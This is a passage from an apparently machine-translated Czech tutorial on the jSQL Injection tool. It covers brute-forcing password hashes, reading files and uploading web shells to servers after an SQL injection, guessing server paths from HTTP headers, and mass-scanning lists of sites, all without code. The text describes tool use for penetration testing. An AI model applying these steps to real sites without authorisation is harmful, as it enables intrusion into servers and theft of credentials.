    Bohužel není příliš mnoho neopatrných programátorů, kteří ukládají hesla v čistém textu. Dost často v řádku s hesly vidíme něco podobného

    8743b52063cd84097a65d1633f5c74f5

    Toto je hash. Můžete jej dešifrovat pomocí hrubé síly. A... jSQL Injection má vestavěný brute force.

    6. Hrubá síla hash pomocí jSQL Injection

    Nespornou výhodou je, že nemusíte hledat další programy. Existuje podpora mnoha nejoblíbenějších hashů.

    To není nejlepší možnost. Abyste se stali guru v dekódování hashů, doporučujeme knihu „“ v ruštině.

    Ale samozřejmě, když není po ruce jiný program nebo není čas na studium, velmi vhod přijde jSQL Injection s vestavěnou funkcí brute force.

    Existují nastavení: můžete nastavit, které znaky jsou součástí hesla, rozsah délky hesla.

    7. Operace se soubory po detekci SQL injekcí

    Kromě operací s databázemi - jejich čtení a úpravy, pokud jsou detekovány injekce SQL, lze provádět následující operace se soubory:

    • čtení souborů na serveru
    • nahrávání nových souborů na server
    • nahrání shellů na server

    A to vše je implementováno v jSQL Injection!

    Existují omezení - SQL server musí mít oprávnění k souboru. Správci chytrého systému je zakázali a nebudou moci získat přístup k systému souborů.

    Přítomnost oprávnění k souborům lze snadno zkontrolovat. Přejděte na jednu ze záložek (čtení souborů, vytvoření shellu, nahrání nového souboru) a pokuste se provést jednu ze zadaných operací.

    Ještě velmi důležitá poznámka – musíme znát přesnou absolutní cestu k souboru, se kterým budeme pracovat – jinak nebude fungovat nic.

    Podívejte se na následující snímek obrazovky:

    Na jakýkoli pokus o operaci se souborem dostáváme odpověď: Žádné oprávnění FILE (žádná oprávnění k souboru). A tady se nedá nic dělat.

    Pokud místo toho máte jinou chybu:

    Problém se zápisem do [název_adresáře]

    To znamená, že jste nesprávně zadali absolutní cestu, kam chcete soubor zapsat.

    Abyste mohli uhodnout absolutní cestu, musíte alespoň znát operační systém, na kterém server běží. Chcete-li to provést, přejděte na kartu Síť.

    Tento záznam (řádek Win64) nám dává důvod předpokládat, že máme co do činění s OS Windows:

    Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Připojení: Keep-Alive Metoda: HTTP/1.1 200 OK Obsah-Length: 353 Datum: Pá, 11. prosince 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; znaková sada=UTF-8

    Zde máme nějaký Unix (*BSD, Linux):

    Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Běží na: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

    A tady máme CentOS:

    Metoda: HTTP/1.1 200 OK Platnost: Čt, 19. listopadu 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Připojení: keep-alive X-Cache-Lookup: MISS z t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS z t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Datum: pá, 11. prosince 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; znaková sada=WINDOWS-1251

    V systému Windows je typická složka pro weby C:\Server\data\htdocs\ . Ale ve skutečnosti, pokud někdo „uvažoval“ o vytvoření serveru na Windows, pak tato osoba velmi pravděpodobně neslyšel nic o privilegiích. Proto byste měli začít zkoušet přímo z adresáře C:/Windows/:

    Jak vidíte, napoprvé vše proběhlo v pořádku.

    Ale samotné shelly jSQL Injection vzbuzují v mé mysli pochybnosti. Pokud máte oprávnění k souborům, můžete snadno něco nahrát pomocí webového rozhraní.

    8. Hromadná kontrola stránek pro SQL injekce

    A dokonce i tato funkce je dostupná v jSQL Injection. Vše je velmi jednoduché - stáhněte si seznam stránek (lze importovat ze souboru), vyberte ty, které chcete zkontrolovat, a kliknutím na příslušné tlačítko spusťte operaci.

    Závěr z jSQL Injection

    jSQL Injection je dobrý, výkonný nástroj pro vyhledávání a následné použití SQL injekcí nalezených na webových stránkách. Jeho nepochybné výhody: snadné použití, vestavěné související funkce. jSQL Injection může být nejlepším přítelem začátečníka při analýze webových stránek.

    Mezi nedostatky bych poznamenal nemožnost editace databází (alespoň jsem tuto funkcionalitu nenašel). Jako u všech nástrojů GUI lze jednu z nevýhod tohoto programu připsat jeho nemožnosti použití ve skriptech. Nicméně určitá automatizace je možná i v tomto programu - díky vestavěné funkci hromadného skenování stránek.

    Program jSQL Injection se používá mnohem pohodlněji než sqlmap. Ale sqlmap podporuje více typů SQL injekcí, má možnosti pro práci se souborovými firewally a některé další funkce.

    Sečteno a podtrženo: jSQL Injection je nejlepší přítel začínajícího hackera.

    Nápovědu k tomuto programu v Kali Linux Encyklopedie naleznete na této stránce: http://kali.tools/?p=706